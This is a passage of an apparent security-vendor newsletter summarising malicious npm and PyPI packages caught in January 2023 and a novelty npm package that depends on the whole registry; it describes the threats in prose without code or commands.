In this edition of Malware Monthly, we take you on a journey through malware that rejects virtual machines, Linux crypto miners, evasive variants of RAT mutants, and a ubiquitous package dependent on the entire publicly available npm ecosystem — all targeted at modern software supply chains. Follow us as we continue to uncover suspicious activities in open source registries.

In terms of the volume of malware caught by our AI-enabled system, 2023 did not start quietly.

In January, we caught 691 malicious packages in the npm registry. A noticeable amount of packages contained mentions of Yandex — the Russian search engine company. Packages including yandex-logger-sentry, yandex-logger-qloud, and yandex-sendsms attempt to exfiltrate information to a rogue server, possibly a bug bounty campaign against Yandex that employs dependency confusion attacks.

We also caught 49 malicious packages in the PyPI registry last month. Notably, the packages reqsystem and httpxfaster published by the same author (sexydev1337), contained heavily obfuscated code with hyperion — an obfuscator we see gaining popularity. Other examples here with heavily obfuscated code include aio6, gorilla2, httpsos, and pohttp packages. Additionally, the packages have and view execute a script that downloads and runs a malicious binary from an external server. In the case of have, some versions contain obfuscated code, and one replaces Discord’s executable.

npm Packages Won’t be Left Behind

If you’ve uploaded your contributions to the npm registry, you might have noticed a dependent package that was common to all the other packages: no-one-left-behind by author Zalastax.

The package was published in 2018 and depended on every other known publicly available npm package. Talk about a next-level dependency hell situation. Here’s how the dependency graph looks:

Possibly inspired by hoarders, a self-described “utility grab-bag” package published in 2012 (at the time hoarders (Read more...)